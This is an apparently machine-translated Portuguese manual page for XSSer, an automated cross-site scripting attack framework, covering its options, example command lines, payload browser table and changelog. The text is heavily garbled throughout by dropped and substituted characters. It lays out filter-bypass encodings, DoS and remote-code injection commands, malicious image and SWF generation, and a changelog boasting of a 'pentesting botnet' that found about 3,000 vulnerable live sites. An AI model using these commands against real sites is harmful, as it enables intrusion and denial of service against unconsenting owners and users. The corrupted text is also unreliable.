Você está na página 1de 20

XSSER

Introduo
Cross Site "Scripter" (aka XSSer) um automtico-estrutura de detectar, exporar e reatar !unera"iidades
XSS em apicati!os "aseados na #e"$
Ee contm !rias op%es para tentar contornar certos &itros, e !rias tcnicas especiais de in'eo de
c(di)o$
* !erso atua
XSSer !+$," ("-.e /os0uito1 S#arm Cin2ento")$
XSSer Cin2ento S#arm
3 Ci0ue para 4oom
5aixar o c(di)o &onte ori)ina1 XSSer !+$,-"eta-
6"untu 7 8e"ian pacote1 XSSer-+$,9a$de"
:acote *rc.;inux1 i)ao *6R (!+$,")
<entoo pacote1 XSSer <entoo e"uid (!+$,")
R:/ pacote1 XSSer-+$,-+$noarc.$rpm
=u atuai2ar sua c(pia diretamente do XSSer-reposit(rio Su"!ersion1
> S!n co .ttps177xsser$s!n$source&or)e$net7s!nroot7xsser xsser
Esta !erso incui mais recursos do <-? 3 inter&ace1
XSSer <-? 3
3 Ci0ue para 4oom
XSSer <-? 3
3 Ci0ue para 4oom
XSSer <-? 3
3 Ci0ue para 4oom
XSSer <-? 3
3 Ci0ue para 4oom
8IC*1 t@pe1 Axsser - )tkA para iniciar a partir de s.e$ =u executar diretamente a partir do menu XSSer Bcone
xsser
Instaao
XSSer executado em muitas pata&ormas$ Ee re0uer :@t.on e as se)uintes "i"iotecas1
- :@t.on-p@cur - ;i)a%es :@t.on para C6R;
- :@t.on-5eauti&uSoup - erro toerante parser C-/; para :@t.on
- :@t.on-i"xmD - ;i)a%es :@t.on para a "i"ioteca X/; <E=/E
- :@t.on-)eoip - ;i)a%es :@t.on para a "i"ioteca de resouo I:-to-countr@ <eoI:
Em sistemas "aseados em 8e"ian (ex1 6"untu), execute1
sudo apt-)et insta p@t.on-p@cur p@t.on-5eauti&uSoup p@t.on-i"xmD p@t.on-)eoip
6so
xsser Fop%esG F-u H-I H-8 G F<- H-: H-C G F:edido (s)G FIectoria (s)G F5@passer (s)G F-cnica (s)G Fin'eco &ina
(s)G
=p%es1
- Iersion mostrar o nJmero da !erso do pro)rama e saBda
-C, - .ep mostrar esta mensa)em de a'uda e sai
-S, - estatBsticas Ier as estatBsticas a!anadas resutados de saBda
-I, - !er"ose modo deta.ado resutados de saBda ati!os
- <tk anamento XSSer <-? Inter&ace (*ssistente incuBdoK)
L CaracterBsticas especiais L1
IocM pode esco.er !etoria (s) e 5@passer (s) para in'etar c(di)o com estas caracterBsticas especiais extra1
- Imx N I/X criar uma ima)em &asa de c(di)o XSS em"utido
- Oa N O;*SC criar um ar0ui!o &aso$ s#& com c(di)o XSS em"utido
L Seecionar 8estino (s) L1
:eo menos uma destas op%es tem de ser especi&icado para de&inir a &onte para o"ter a!o (s) de urs$
IocM precisa esco.er para executar XSSer1
-6 6R;, - ur N 6R; 8i)ite a!o (s) para auditar
-I readOie ;eia 6R;s a!o de um ar0ui!o
-8 8=R? :rocesso motor de "usca resutados dork como urs a!o
- 8e N 8=R?9EE<IEE /otor de "usca para usar dorkin) ("in), ata!ista,
Pa.oo, 5aidu, Pandex, @oudao, #e"cra#er, )oo)e, etc
Ier ima)em dork$p@ para !eri&icar se os motores disponB!eis)
L Seecione o tipo de conexo C--: 7 C--:S (s) L1
Essas op%es podem ser usadas para especi&icar 0ua parQmetro (s) 0ue dese'a utii2ar como car)a para
in'etar c(di)o$
-< )etdata 8i)ite o pa@oad para auditar usando <E-$ (Ex1 A7 menu$p.p 0 NA)
-: :=S-8*-* 8i)ite o pa@oad para auditar usando :=S-$ (Ex1 A&oo N + R "ar NA)
-C R*S-ES*/EE-= EJmero de urs para rastrear no a!o (s)1 +-TTTTT
- C# N CR*U;IE<9UI8-C EB!e 8eepin) de rastreador1 +-V
- C Rastrear apenas oca (s) urs a!o (de&aut -R6E)
L Con&i)ure Re0uest (s) L1
Essas op%es podem ser usadas para especi&icar como se conectar ao a!o (s) car)a (s)$
IocM pode esco.er mJtipas1
- Cookies N 5=;IEC= /ude o seu ca"ea.o C--: Cookie
- 8rop-"oin.o I)norar ca"ea.o Set-Cookie de resposta
- 6ser-a)ent N *<EE-E /ude o seu ca"ea.o 6ser-*)ent C--: (padro &aso)
- Re&erer N REOERER 6se outro Re&erer do ca"ea.o C--: (E=EE de&aut)
- X&or# 8e&ina o seu C--: X-transmitido-:ara a !aores de I: aeat(rios
- Xcient 8e&ina o seu X-Cient-I: com !aores de I: aeat(rios C--:
- Ceaders N CE*8ERS Ca"ea.os C--: extra no!a in.a separada
- 8o tipo aut. N *Escre!a -ipo de autenticao C--: (5asic, 8i)est, <SS ou E-;/)
- *ut.-cred N *CRE8 *s credenciais de autenticao C--: (name1 pass#ord)
- :rox@ N :R=XP 6sar ser!idor prox@ (tor1 .ttp177oca.ost1W++W)
- I)nore-prox@ I)norar prox@ C--: padro do sistema
- -imeout N -I/E=6- Seecione o tempo imite (padro XY)
- Retries N RE-RIES -entati!as 0uando o tempo imite de conexo (de&aut +)
- Oios N R=SZ6EI* = nJmero mximo de soicita%es C--: simutQneas (de&aut V)
- 8ea@ N *-R*S= *traso em se)undos entre cada re0uisio C--: (de&aut Y)
- -cp-Eo8ea@ 6se a opo -C:9E=8E;*P
- Si)a-redireciona XSSer !ai acompan.ar as respostas de redirecionamento do ser!idor (XYD)
- Si)a-imit N O;I 8e&inir 0uantas !e2es XSSer se)uir redirecionamentos (padro VY)
L Ieri&icador de Sistemas L1
Esta opo Jti para sa"er se o seu a!o (s) tem a)uns &itros contra ata0ues XSS,
para redu2ir os resutados "&asos positi!os" e de reai2ar testes mais a!anados1
- Eo-ca"ea E[= !eri&icar a esta"iidade da ur (c(di)os1 DYY H XYD) com uma ca"ea pedido de pr-
c.eck
- Ii!o N IS*;IIE de&inir imite de cada 0uanta erros XSSer de!e !eri&icar se a!o est !i!o
- Cas. en!iar um .as. Jnico, sem !etores, a pr-seeo se o a!o (s) repete todo o conteJdo rece"ido
- CeurBstica anar um teste de .eurBstica para desco"rir 0uais parQmetros so &itrados no a!o (s)
c(di)o1\ ] 7 ^_ "AN
- C.eckatur N *;- !eri&icar se . uma resposta XSS !ida de a!o (s) em uma ur aternati!a$ AXSS ce)oA
- C.eckmet.od N *;-/ !eri&icar as respostas do a!o (s), utii2ando um tipo de conexo di&erente1 <E- ou
:=S- (padro1 <E-)
- C.eckatdata N *;8 !eri&icar as respostas do a!o (s), utii2ando uma car)a aternati!a (de&aut1 o mesmo
0ue a primeira in'eo)
- Re!erse-c.eck esta"eecer uma i)ao in!ersa da (s) a!o para a XSSer certi&icado 0ue +YY`
!uner!e
L Seect !etoria (s) L1
Estas op%es podem ser utii2adas para especi&icar uma &onte de !ector de c(di)o de XSS a in'ectar em cada
car)a$
Importante, se !ocM no 0uer tentar in'etar um !etor XSS comum, usado por padro$
Esco.a apenas uma opo1
- :a@oad N SCRI:- :Ra:RI=S - Insira o seu XSS construo-manuamente
- *uto *6-= - Insert XSSer AreatouA !etores de ar0ui!o (!etores C-/;V incuBdoK)
L Seect 5@passer (s) L1
Estas op%es podem ser utii2adas para codi&icar !ector seeccionado (s) a tentar contornar todas as
possB!eis &itros anti-XSS
no a!o (s) c(di)o e a)umas re)ras I:S, se o a!o us-o$ *m disso, pode ser com"inada com outras
tcnicas para proporcionar a codi&icao1
- Str 6se o mtodo Strin)$&romC.arCode ()
- 6ne 6se a &uno 6nescape ()
- /isturar /istura Strin)$&romC.arCode () e 6nescape ()
- 8ec 6sar codi&icao 8ecima
- Cex 6sar codi&icao .exadecima
- Ee 6sar codi&icao .exadecima, com ponto e !Br)ua
- 8#o Codi&icar !etores endereos I: em 8U=R8
- 8oo Codi&icar !etores endereos I: em =cta
- Cem -ente-manuamente muta%es di&erentes de codi&icao de caracteres
(=&uscao in!erso1 a) -_ (ex1 A/ix, 6ne, Str, CexA)
L -cnica especia (s) L1
Essas op%es podem ser usadas para tentar in'etar c(di)o usando !rios tipos de tcnicas de XSS$ IocM
pode esco.er mJtipas1
- Coo C== - Cross Site Scriptin) in'eo 5iscoito
- Xsa XS* - Cross Site Scriptin) *)ent
- Xsr XSR - Cross Site Scriptin) Re&erer
- 8C: 8C: - 8ata Contro :rotoco in'e%es
- 8om 8=/ - 6se *nc.or Ourti!o (8=/ som"rasK)
- Ind IE8 - Response Spittin) c(di)o Induced C--:
- *nc.or *EC - 6so *nc.or Ourti!o pa@oader (8=/ som"rasK)
- :C:I8S :C: - Exporar :C:I8S "u) (Y$,$V) para contornar os &itros
L Seect in'eo de&initi!a (s) L1
Estas op%es podem ser utii2ados para especi&icar o c(di)o &ina a in'ectar no a!o !uner!e (s)$
Importante, se !ocM 0uiser exporar
on-t.e-#id suas !unera"iidades desco"ertas$ Esco.a apenas uma opo1
- Op N OIE*;:*P;=*8 :Ra:RI=S - Insira o c(di)o &ina para in'etar-manuamente
- Or N OIE*;RE/=-E Remota - insira seu c(di)o &ina para in'etar-remotamente-
- 8oss 8oss - XSS 8enia o& ser!ice (ser!idor) de in'eo
- 8os 8=S - 8enia XSS de ser!io (ciente) de in'eo
- 5,b 5,b - 5ase,b codi&icao c(di)o na ta) /E-* (ROCDXTc)
L In'eo &ina especia (s) L1
Estas op%es podem ser utii2adas para executar a)uma in'eco "especia" (s) no a!o !uner!e (s)$
IocM pode seecionar mJtipos e com"inar com o seu c(di)o &ina (exceto com c(di)o :C8)1
- =E/ =E/ - 6se on/ouse/o!e () e!ento para in'etar c(di)o
- I&r IOR - 6se "i&rame" ta) &onte para in'etar c(di)o
L 8i!ersos L1
- Sient ini"ir resutados de saBda do consoe
- *tuai2ar !eri&icar se . XSSer Jtima !erso est!e
- Sa!ar produ2ir todos os resutados diretamente ao modeo (XSSist$dat)
- Xm N OI;EX/; saBda Apositi!osA para ar0ui!o aX/; (- xm &iename$xm)
- Curtas N SC=R-6R;S exposio-&ina code-s.ortered (-in@6R;, is$)d)
- ;anamento anar um na!e)ador no &ina de cada XSS desco"erto
- -#eet pu"icar cada XSS desco"ertos no AS#arm cin2aK "
- -#eet-ta)s N -- adicionar mais ta)s aos seus XSS pu"ica%es desco"ertos (de&aut1 d XSS) - (ex1 d d
xsser !unera"iidade)
Exempos
Se !ocM tem exempos interessantes de uso so"re XSSer, en!ie um e-mai para a ista de discusso $
-------------------
L Simpes in'eo de 6R;1
> :@t.on xsser$p@-u ".ttp177.ost$com"
-------------------
L In'eo simpes de ar0ui!o, com procurao tor e &asi&icao de ca"ea.os C--: Re&erer1
> :@t.on xsser$p@-i "&ie$txt" - prox@ ".ttp177+Dc$Y$Y$+1W++W" - re&erer ",,,$,,,$,,,$,,,"
-------------------
L /Jtipas in'e%es de 6R;, com automtico pa@oadin), usando prox@ tor, in'etando na codi&icao de
caracteres car)as em ".exadecima", com a saBda deta.ada e sa!ar os resutados para o ar0ui!o
(XSSist$dat)1
> :@t.on xsser$p@-u ".ttp177.ost$com" - prox@ ".ttp177+Dc$Y$Y$+1W++W" - auto - Cex - !er"ose-#
-------------------
L /Jtipas in'e%es de 6R;, com automtico pa@oadin), usando caracter muta%es de codi&icao (em
primeiro u)ar, mudar de car)a para .exadecima, em se)undo u)ar, mude para Strin)OromC.arCode a
primeira codi&icao, em terceiro u)ar, reencode para Cexadecima o se)undo tipo de codi&icao), com
C--: 6ser-*)ent &asi&icado, aterando tempo imite a "DY", e usando mutit.reads (V t(picos)1
> :@t.on xsser$p@-u ".ttp177.ost$com" - auto - Cem "Cex, Str, Cex" - user-a)ent "XSSerK" - -imeout "DY" -
t(picos "V"
-------------------
L *!ano in'eo de ar0ui!o, pa@oadin) seu-pr(prio-car)a e usando 6nescape () codi&icao de caracteres
para contornar os &itros1
> :@t.on xsser$p@-i "urs$txt" - pa@oad "a N" )et "" N" 6R; (] "" c N "'a!ascript1"\ d N "aert (AXSSA)\ ]" ) "\ E!a
(a 3 " 3 c 3 d)\ A- 6ne
-------------------
L In'eo de 8ork seecionando motor "duck" (XSSer tempestadeK)
> :@t.on xsser$p@ - 8e "pato"-d "e Searc.$p.p"
-------------------
L In'eo de Cra#er com pro&undidade X e b p)inas para !er (XSSer *ran.aK)
> :@t.on xsser$p@-cX - C# N b u ".ttp177.ost$com"
-------------------
L Simpes in'eo de 6R;, usando :=S-, com resutados estatBsticos1
> :@t.on xsser$p@-u ".ttp177.ost$com"-p "index$p.pe -ar)et N searc. R su"tar)et N top R searc.strin) N"-s
-------------------
L /Jtipas in'e%es de 6R; para um parQmetro com o en!io de <E-, usando pa@oadin) automtico, com I:
=cta pa@oadin) o&uscation e resutados printerin) em um "tin@ur" ink s.ortered (pronto para
comparti.arK)1
> :@t.on xsser$p@-u ".ttp177.ost$com"-) ""s 7 0 Ne" - *uto - 8oo - s.ort tin@ur
-------------------
L Simpes in'eo de 6R;, usando <E-, in'etando um !etor no parQmetro Cookie, tentando usar uma som"ra
espao 8=/ (sem o) do ser!idorK) E se existe 0ua0uer ""uraco", apicando a sua car)a manua do c(di)o
&ina "maicioso" (pronto para o rea ata0ues)1
> :@t.on xsser$p@-u ".ttp177.ost$com"-) ""s 7 0 Ne" - Coo - 8om - "K 8i)ite o c(di)o de in'eo &ina a0ui" Or
N
-------------------
L Simpes in'eo de 6R;, usando <E- e tentando )erar resutados com um "ma-intencionado" ink
s.ortered (is$)d) com 8oS !ido (dene)ao de ser!io) na!e)ador pa@oad ciente1
> :@t.on xsser$p@-u ".ttp177.ost$com"-) ""s 7 0 Ne" - 8os - curta "is$)d"
-------------------
L /Jtipas in'e%es para !rios u)ares, metas de extrao de uma ista em um ar0ui!o, a apicao
automtica pa@oadin), aterar tempo imite para "DY" e usando mutit.reads (V t.reads), aumentando a
demora entre peti%es a +Y se)undos, in'etar parQmetros C--: user-a)ent, C--: Re&erer e nos parQmetros
de cookies, usando prox@ -or, com I: =cta o&uscation, com resutados estatBsticos, no modo deta.ado e
criar inks s.ortered (tin@ur) de 0uais0uer car)as in'et!eis !idos encontrados$ (/odo de 'o)o reaK)
> :@t.on xsser$p@-i "ist9o&9ur9tar)ets$txt" - auto - timeout "DY" - t(picos "V" - atraso de "+Y" - xsa - xsr -
Coo - prox@ " +Dc$Y$Y$+1W++W "- 8oo-s - !er"ose - 8os - s.ort" tin@ur "
-------------------
L In'eo de usurio XSS !etor diretamente em um maicioso-&ake-ima)em criada "em estado se!a)em", e
pronto para ser carre)ado$
> :@t.on xsser$p@ - Imx "test$pn)" - car)a "K 8i)ite o c(di)o maicioso in'eo a0uiK"
-------------------
In'e%es L Reat(rio de saBda Apositi!osA de uma pes0uisa dorkin) (usando "pedir" dorker) diretamente para
um ar0ui!o X/;$
> :@t.on xsser$p@-d "o)in$p.p" - 8e "pedir" - xm "securit@9report9XSSer98ork9cui$xm"
-------------------
L :u"icar saBda in'e%es de uma pes0uisa dorkin) Apositi!osA (usando o "pato" dorker) diretamente para
.ttp177identi$ca
(Oederado XSS pentestin) "otnet)
> :@t.on xsser$p@-d "o)in$p.p" - 8e "pato" - -#eet
L Exempos ine1
- .ttp177identi$ca7xsser"otY+
- .ttp177t#itter$com7xsser"otY+
-------------------
L Criar um &ime s#&$ Com c(di)o XSS in'etado
> :@t.on xsser$p@ - &a "nome9do9ar0ui!o"
-------------------
L En!iar um .as. pr-!eri&icao para !er se o a!o !ai )erar &asos-positi!os-resutados
> :@t.on xsser$p@-u ".ost$com" - de .as.
-------------------
L /Jtipas in'e%es &u22in) de ur, incuindo 8C: in'e%es e exporar o nosso c(di)o "pr(prio", &asi&icado
em um ink s.ortered, em resutados positi!os &undada$ XSS expora em tempo rea$
> :@t.on xsser$p@-u ".ost$com" - auto - 8C: - Op "enter9@our9code9.ere" - curta "is$)d"
-------------------
L Exporando 5ase,b codi&icao c(di)o ta) /E-* (ROCDXTc) em uma car)a manua de um a!o !uner!e$
> :@t.on xsser$p@-u ".ost$com"-) "!unera"e9pat." - car)a "!aid9!ector9in'ected" - 5,b
-------------------
L Exporando nossa-remote "pr(prio" c(di)o em uma car)a desco"erto usando de di&uso e an-o em um
na!e)ador diretamente
> :@t.on xsser$p@-u ".ost$com"-) "!unera"e9pat." - auto - Or "m@9.ost 7 pat. 7 code$'s" - anamento
Ima)ens
Se !ocM tem ima)ens interessantes so"re XSSer, en!ie um e-mai para a ista de discusso $
-------------------
XSSer1 &erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es XSSer1
&erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es
EJceo1 C.amada para a'udar menu principa (- .ep) (!+$V) EJceo1 Exempo de in'e%es automticas
(!+$V)
XSSer1 &erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es XSSer1
&erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es
EJceo1 Exempo de c(di)o remoto (- Or) (!+$Y) EJceo1 - (!+$Y) Exempo de in'eo 8C: (8C:)
XSSer1 &erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es XSSer1
&erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es
<-?1 8ocumentao (!+$V) <-?1 Ui2ard Ceper (!+$V)
XSSer1 &erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es XSSer1
&erramenta automtica para pentestin) ata0ues XSS contra di&erentes apica%es
<-?1 Reat(rio rastreamento resutados de idiota (!+$V) <-?1 (s) Reat(rios <eomap meta )o"a (!+$V)
IBdeos
Se !ocM tem !Bdeos interessantes so"re XSSer, en!ie um e-mai para a ista de discusso $
-------------------
Ierso de XSSer (!+$V)1
- Exempo de inter&ace de !Bdeo XSSer <-?$
Iers%es anti)as do XSSer (!Y$V ^)1
- Iideo+ 1 Simpes automticas !etores pa@oadin)$ L Reatado para o destino (Y,7Yc7DY+Y) L$
- IideoD 1 re)isto do ado do ser!idor *pac.e$ L Spoo&in) demostration L$
- IideoX 1 8orkin) in'e%es com resutados stadistics$ L = modo anti)o exporadorK L
:a@oads
XSSer usa uma ista de !etores !idos XSS para &a2er ata0ues automticos pa@oadin) no a!o (s)$
Se !ocM ti!er XSS interessantes "c(di)os", en!ie um e-mai para a ista de discusso $
-------------------
* ta"ea de re&erMncia com os na!e)adores suportados 1
IEc$Y Iector &unciona no Internet Exporer c$Y$ /ais recentemente testado com o Internet
Exporer c$Y$VcYY$, RC+, Uindo#s X: :ro&essiona S:D$
IE,$Y Iector &unciona no Internet Exporer$ /ais recentemente testado com o Internet Exporer
,$Y$DW$+$++Y,C=, S:D no Uindo#s DYYY$
ESW$+-IE Iector &unciona no Eetscape W$+ 3 no modo motor de renderi2ao do IE$ /ais
recentemente testado com Eetscape W$+ no Uindo#s X: :ro&essiona$ Isto costuma!a ser c.amado de
modo con&i!e, mas Eetscape mudou seu modeo de se)urana on)e do modeo con&i!e 7 no con&i!e
e optou para <ecko como padro eo IE como uma opo$
ESW$+-< Iector &unciona no Eetscape W$+ 3 no modo motor de renderi2ao <ecko$ /ais
recentemente testado com Eetscape W$+ no Uindo#s X: :ro&essiona
OOD$Y Iector tra"a.a em motor de renderi2ao <ecko do /o2ia, utii2ado peo Oire&ox$ /ais
recentemente testado com Oire&ox D$Y$Y$D no Uindo#s X: :ro&essiona$
=T$YD Iector &unciona no =pera$ /ais recentemente testado com o =pera T$YD, 5uid WVW, no
Uindo#s X: :ro&essiona
ESb Iector &unciona em !ers%es mais anti)as do Eetscape b$Y - no &oi testado$
*s in'e%es so !idos como pro!a de 0ue os na!e)adores$ = atacante pode executar o c(di)o dese'ado, se
0ua0uer uma das istas$
5aixar
XSSer (!erso o&icia) pode ser "aixado a partir de sua p)ina de ista de ar0ui!os SourceOor)e $ :or
en0uanto, do#noad est disponB!e no se)uinte &ormato1
Oonte )2ip sistema operaciona independente$
IocM tam"m pode &a2er o c.eckout da Jtima !erso de desen!o!imento do XSSer-reposit(rio Su"!ersion1
> S!n co .ttps177xsser$s!n$source&or)e$net7s!nroot7xsser xsser
:acotes
XSSer !+$,"1 "S#arm cin2aK" (/ais atuai2ado)1
*rc.inux1 i)ao *6R
<entoo1 XSSer <entoo e"uid
R:/ pacote1 XSSer-+$,-+$noarc.$rpm
6"untu 7 8e"ian pacote1 XSSer-+$,9a$de"
Instaao1
tar x2!& xsser-+$,9a$de"$tar$)2
sudo dpk)-i xsser-+$,9a$de"
Executar (modo <-?)1
xsser - )tk - sient
-------------------
XSSer !+$V1 "S#arm EditionK"1
*rc.inux1 i)ao *6R
6"untu 7 8e"ian1 xsser9+$V-+9a$de"$tar$)2
-------------------
XSSer !+$Y1 "= mos0uito"1
*rc.inux1 i)ao *6R
6"untu 7 8e"ian1 xsser9+$Y-D9a$de"$tar$)2
C.an)eo)
Eo!em"ro, DW, DY++1
XSSer !erso +$,-"eta-aka "<re@ S#armK" anadoK
EJceo1 opo Cookies Somou <ota 3 *dicionado X-Oor#arded-Oor <SS *dicionado e mtodos de
autenticao E-;/ *dicionado opo I)norar procurao 3 *dicionado opo opo 3 opo X-Cient-I:
aeat(rio 3 3 -C:-I: 3 Eo8ea@ *eat(rio *dicionado Si)a opo redirecionamentos 3 *dicionado Si)a
redirecionamentos parQmetro imitador 3 *dicionado sistema de pr-!eri&icao *uto-CE*8 3 *dicionado
opo Eo-C*5Ef* 3 *dicionado opo is*i!e 3 adicionado Con&ira a opo ur (5ind XSS) 3 *dicionado
re!ersa Ieri&i0ue o parQmetro 3 :C:I8S *dicionado (!$Y$,$V) expoit 3 adicionou mais !etores a auto-
pa@oadin) 3 *dicionado C-/;V estudou !etores 3 &ixos erros di&erentes no nJceo 3 op%es .anderer &ixos
onda 3 sistema 8orkerers &ixo 3 5u)s corri)idos nos resutados propa)ao 3 soicita%es p(s-&ixados$
<-?1 adicionou no!as &uncionaidades ao controador <-? 3 *dicionado !istas deta.adas para a inter&ace
<-?$
Oe!ereiro, DV, DY++1
:acote adiciona para *rc.inux$ /ais in&orma%es a0ui
Db de &e!ereiro de DY++1
XSSer !erso +$V-"eta-aka "edio S#armK" anadoK
EJceo1 *dicionado opo <-? 3 pro!a 3 CeurBstica 8i!iso de resposta C--: (K *k$a ata0ue indu2ido) 3
8oS (Ser!er) de in'eo 3 3 3 opo *tuai2ar C(di)o impo c(di)o &ina (adicionado 8C: R 8=/ in'e%es) 3
corre%es de "u)s 3 Eo!o menu de op%es 3 /ais sistema de estatBsticas do a!anado 3 *tuai2ado ista
dorkerers$
<-?1 Ea!e)ao intuiti!a 3 *ssistente de .eper ("construir seu pentestin) responder a a)umas
per)untas") 3 !iseira especiaista (com a!o (s) )eoocai2ao incuBdo 3 8ocumentao$
Criado pacote XSSer (!+$V) para sistemas "aseados no 6"untu 7 8e"ian$
IocM pode "aixar a0ui1 xsser9+$V-+9a$de"$tar$)2
Eo!em"ro, +X, DY+Y1
XSSer pacote para *rc.inux pode ser encontrado na *6R$ /ais in&orma%es a0ui
++ de no!em"ro de DY+Y1
Criado pacote XSSer (!+$Y) para sistemas "aseados no 6"untu 7 8e"ian$
IocM pode "aixar a0ui1 xsser9+$Y-D9a$de"$tar$)2
Eo!em"ro T, DY+Y1
*dicionado resutados estatBsticos mais a!anados 3 5u)&ixi)$
Eo!em"ro c, DY+Y1
XSSer !erso +$Y aka "= /os0uito" anadoK
*dicionado opo "in'e%es remotos &inais" 3 Cru2 *ta0ue do Oas.K 3 Cru2 Zuadro Scriptin) 3 8ata
Contro :rotoco In'e%es 3 5ase,b (ROCDXTc) :oC 3 =n/ouse/o!e :oC 3 anador Ea!e)ador 3 c(di)o
impo corre%es de "u)s 3 3 3 Eo!o menu de op%es pr-!eri&icao do sistema 3 rastreador spiderin)
cones 3 sistema de estatBsticas mais a!anado 3 "/ana" resutados de saBda $
=utu"ro W, DY+Y1
:=C1 8eteco, exporao e comunicao "&c)i-"in7ec.o" !unera"iidade da =race com XSSer
$ 7 XSSer-d "" inur1 &c)i-"in7ec.o A"- 8e" )oo)e "- prox@" .ttp177+Dc$Y$Y$+1W++W "-s - -#eet
=s resutados do-"otnet-ata0ue em tempo rea1
- .ttp177identi$ca7xsser"otY+
- .ttp177t#itter$com7xsser"otY+
*erta1 aprox$ X$YYY sites encontram !uner!eis (XSSer tempestadeK)$
DD de setem"ro de DY+Y1
*dicionado a-xm exportador Ima)eXSS 3 3 Eo!os motores dorker (tota +Y) 3 EJceo impo 3 corre%es
de "u)s 3 Redes Sociais XSS auto-editora 3 Iniciado-&ederado-XSS (di!u)ao competa) pentestin) "otnet$
.ttp177identi$ca7xsser"otY+
.ttp177t#itter$com7xsser"otY+
DY de a)osto de DY+Y1
*dicionado car)as ata0ue auto-pa@oader (D, no!as in'e%es) 3 :=S- 3 Statistics 3 Redutores de 6R; 3
=cta I: 3 p(s-processamento pa@oadin) 3 8om Som"rasK 3 5iscoito in'ector 3 Ea!e)ador 8oS (dene)ao
de Ser!io)$
Y+ de 'u.o de DY+Y1
8orkin) 3 3 Cra#in) I: 8U=R8 3 EJceo impo$
+T a"ri de DY+Y1
C--:S impementado 3 erros remendado$
DD maro de DY+Y1
*dicionado "in'etar sua pr(pria car)a" opo$ :ode ser usado com todos os caracteres de codi&icao-
"@passers-de XSSer$
+W maro de DY+Y1
*dicionado car)as ata0ue auto-pa@oader (,D di&erentes in'e%es de XSS)$
+, maro de DY+Y1
*dicionado no!os codi&icadores de car)a para contornar os &itros$
8ocumentao
Se !ocM ti!er a documentao interessante so"re XSSer, en!ie um e-mai para a ista de discusso $
-------------------
Sides XSSer - "= 0uadro de Cross Site Scriptin)" - DY+D, apresentado em RootedCon (em espan.o)
Sides XSSer - "= mos0uito" - DY++ apresentado em -CSOA++ (In)Ms)
"XSS para di!erso e ucro"1
:8O com exempos prticos de a)umas tcnicas de XSS$ Ee &oi apresentado na con&erMncia SC<-DYYT1
Ierso em In)Ms
Ierso em espan.o
XSSer 6R; )erao de es0uema1
;ista de /aiin)
XSSer tem uma ista de discusso .ospedada no SourceOor)e $
* ista de discusso xsser-usersgists$source&or)e$net a maneira pre&erida de &a2er per)untas, reatar
"u)s, su)erir no!os recursos e discutir com outros usurios$
* ista de discusso ar0ui!ado on-ine $ :ara inscre!er-se utii2ar o &ormurio on-ine $
;icena
XSSer i"erado so" os termos da ;icena :J"ica <era !X e prote)ido por ps@ $
*utor
<:< :u"ic ?e@ I81 Yx5W*CXcc,
Ue"site1
.ttp177ordeps@on$net
Emai1
ps@
Eps@on
/icro"o))in)1
identi$ca
c.iro
Comunidade
Se !ocM interessante em se)uir Jtimas notBcias so"re XSSer, !ocM pode se 'untar d xsser-comunidade em
muitos u)ares di&erentes1
/icro"o))in)1
identi$ca
t#itter$com
Redes sociais1
orea$or)
=u usando IRC1
irc$&reenode$net 7 cana1 d xsser
Contri"uir
Se !ocM 0uiser contri"uir para o desen!o!imento XSSer, reatando um "u), proporcionando um patc.,
comentando so"re a "ase de c(di)o ou simpesmente precisa encontrar a'uda para executar XSSer, primeiro
consute a documentao xsser e, em se)uida, na!e)ar na xsser ista de ar0ui!os on-ine $ Se nin)um
rece"e de !ota a !ocM, ento mande-me um e-mai $
:or &a!or, adicione um ink para este site 0uando !ocM reatar a)umas !unera"iidades XSS &undada por
XSSer$